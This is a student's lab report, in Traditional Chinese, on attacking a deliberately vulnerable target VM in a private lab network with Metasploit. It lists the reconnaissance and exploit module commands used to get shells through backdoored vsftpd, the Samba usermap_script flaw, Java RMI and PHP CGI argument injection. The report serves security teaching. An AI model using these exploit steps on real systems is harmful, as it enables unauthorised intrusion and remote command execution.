20222406 2024-2025-1 《網路與系統攻防技術》實驗六實驗報告
1.實驗內容
- 前期滲透:在 root 許可權下進行主機發現、埠掃描、掃系統版本和漏洞操作。
- 多種漏洞利用:包括 Vsftpd 原始碼包後門漏洞(21 埠)、SambaMS - RPC Shell 命令注入漏洞(139 埠)、Java RMI SERVER 命令執行漏洞(1099 埠)、PHP CGI 引數執行注入漏洞(80 埠)。
2.實驗過程
首先從官網下載靶機,其中使用者名稱和密碼都是msfadmin
。
2.1 前期滲透
2.1.1 主機發現
我的靶機IP為192.168.137.146,此處需要進入root許可權下,否則後續可能失敗。
我的虛擬機器IP為192.168.137.128
隨後依次輸入命令msfconsole
、search arp_sweep
、use 0
、set RHOSTS 192.168.137.0/24
、set THREADS 50
、run
:
從[+]的第三個可以發現靶機。
2.1.2 埠掃描
輸入search portscan/tcp
、use 0
、set ROHSTS 192.168.137.146
、run
:
成功掃描出了開放的tcp埠。
2.1.3 掃系統版本、漏洞
輸入search auxiliary/scanner/smb/smb_version
、use 0
、set RHOSTS 192.168.137.146
、run
:
目標主機執行的是Samba 3.0.20-Debian,且使用SMB Detected (versions:1),可能存在一些已知漏洞。
2.2 Vsftpd原始碼包後門漏洞(21埠)
漏洞原理:在特定版本的vsftpd伺服器程式中,被人惡意植入程式碼,當使用者名稱以“😃”為結尾,伺服器就會在6200埠監聽,並且能夠執行任意程式碼。
輸入msfconsole
、search exploit/unix/ftp/vsftpd_234_backdoor
、use 0
、set RHOST 192.168.137.146
、run
:
輸入uname –a
、 pwd
、 id
驗證:
2.3 SambaMS-RPC Shell命令注入漏洞(埠139)
漏洞原理:Samba中負責在SAM資料庫更新使用者口令的程式碼未經過濾便將使用者輸入傳輸給了/bin/sh。如果在呼叫smb.conf中定義的外部指令碼時,透過對/bin/sh的MS-RPC呼叫提交了惡意輸入的話,就可能允許攻擊者以nobody使用者的許可權執行任意命令。
輸入msfconsole
、search exploit/multi/samba/usermap_script
、use 0
、set RHOST 192.168.137.146
、exploit
:
輸入uname–a
驗證:
2.4 Java RMI SERVER命令執行漏洞(1099埠)
漏洞原理:Java RMI Server的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致程式碼執行。
參考2.1.2檢視埠是否開放:
發現1099開放後輸入search exploit/multi/misc/java_rmi_server
、use 0
、show options
、set RHOST 192.168.137.146
、exploit
:
輸入sessions -i 1
進入任務,再輸入shell
,利用whoami
命令驗證,得到結果root:
2.5 PHP CGI引數執行注入漏洞(80埠)
漏洞原理:CGI指令碼沒有正確處理請求引數,導致原始碼洩露,允許遠端攻擊者在請求引數中插入執行命令。
輸入search exploit/multi/http/php_cgi_arg_injection
、use 0
、set RHOST 192.168.137.146
、exploit
:
輸入dir
驗證:
3.問題及解決方案
- 問題1:在進行埠掃描時有時候無法正確執行
- 問題1解決方案:在確保使用root許可權後可以在kali中新開一個埠
4.學習感悟、思考等
透過本次《網路與系統攻防技術》實驗,我收穫頗豐。實驗過程中親身體驗了從前期滲透到利用多種漏洞攻擊靶機的完整流程,深刻認識到網路安全的複雜性和重要性。各個漏洞的原理和利用方式讓我明白,即使看似平常的服務和埠都可能隱藏巨大風險,如 Vsftpd 原始碼包後門漏洞、Samba 等相關漏洞。同時,實驗中遇到埠掃描問題也讓我意識到許可權管理在網路操作中的關鍵作用。這次實驗不僅提高了我的實踐操作能力,更讓我對網路攻防有了新的理解,也提醒我在網路環境中需要時刻保持警惕,注重安全防護,進一步激發了我深入學習網路安全知識的熱情。